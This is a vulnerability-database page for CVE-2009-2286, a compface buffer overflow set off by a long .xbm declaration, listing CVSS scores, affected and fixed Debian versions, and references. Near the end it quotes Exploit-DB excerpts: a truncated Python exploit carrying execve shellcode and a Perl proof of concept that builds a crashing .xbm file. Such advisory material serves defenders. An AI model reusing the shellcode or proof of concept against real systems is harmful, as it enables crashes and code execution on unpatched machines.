CVE-2009-2286
published 2009-07-01CVE-2009-2286: Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to cause a denial of service (crash) via a long declaration in a .xbm file. NOTE…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
3.08%
86.1th percentile
Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to cause a denial of service (crash) via a long declaration in a .xbm file. NOTE: this issue only affects compface on distributions that used a certain patch.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libcompface | < libcompface 1:1.5.2-5 (bookworm) | libcompface 1:1.5.2-5 (bookworm) |
| james_ashton | compface | <= 1.5.2 | — |
| james_ashton | compface | — | — |
| james_ashton | compface | — | — |
| james_ashton | compface | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv4.3MEDIUM
vendor_debian4.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6crq-w9mv-v5mf: Buffer overflow in compface 1
ghsa_unreviewed·2022-05-02
CVE-2009-2286 [MEDIUM] CWE-119 GHSA-6crq-w9mv-v5mf: Buffer overflow in compface 1
Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to cause a denial of service (crash) via a long declaration in a .xbm file. NOTE: this issue only affects compface on distributions that used a certain patch.
OSV
CVE-2009-2286: Buffer overflow in compface 1
osv·2009-07-01·CVSS 4.3
CVE-2009-2286 [MEDIUM] CVE-2009-2286: Buffer overflow in compface 1
Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to cause a denial of service (crash) via a long declaration in a .xbm file. NOTE: this issue only affects compface on distributions that used a certain patch.
Debian
CVE-2009-2286: libcompface - Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to ...
vendor_debian·2009·CVSS 4.3
CVE-2009-2286 [MEDIUM] CVE-2009-2286: libcompface - Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to ...
Buffer overflow in compface 1.5.2 and earlier allows user-assisted attackers to cause a denial of service (crash) via a long declaration in a .xbm file. NOTE: this issue only affects compface on distributions that used a certain patch.
Scope: local
bookworm: resolved (fixed in 1:1.5.2-5)
bullseye: resolved (fixed in 1:1.5.2-5)
forky: resolved (fixed in 1:1.5.2-5)
sid: resolved (fixed in 1:1.5.2-5)
trixie: resolved (fixed in 1:1.5.2-5)
No detection rules found.
Exploit-DB
Compface 1.1.5 - '.xbm' Local Buffer Overflow
exploitdb·2009-07-30
CVE-2009-2286 Compface 1.1.5 - '.xbm' Local Buffer Overflow
Compface 1.1.5 - '.xbm' Local Buffer Overflow
---
#!/usr/bin/python
#[*] Exploit : Compface '.xbm' Local Buffer Overflow Exploit
#[*] Affected : compface 1.1.5
#[*] Tested on : Ubuntu 9.04 (without stack randomization)
#[*] Refer : bid/35863
#[*] Exploit : His0k4
#[*] Use : $compface exploit.xbm out
#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
shellcode=(
"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42"
"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\
Exploit-DB
Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)
exploitdb·2009-06-17
CVE-2009-2286 Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)
Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################
# compface allah.xbm") or die;
print ISLAM "#define noname_width 48\n#define noname_height 48\n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {\n";
close(ISLAM) or die;
print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n";
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################
# milw0rm.com [2
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534973http://www.openwall.com/lists/oss-security/2009/06/29/2http://www.openwall.com/lists/oss-security/2009/06/29/4http://www.openwall.com/lists/oss-security/2009/07/03/1http://www.securityfocus.com/bid/35863http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534973http://www.openwall.com/lists/oss-security/2009/06/29/2http://www.openwall.com/lists/oss-security/2009/06/29/4http://www.openwall.com/lists/oss-security/2009/07/03/1http://www.securityfocus.com/bid/35863
2009-07-01
Published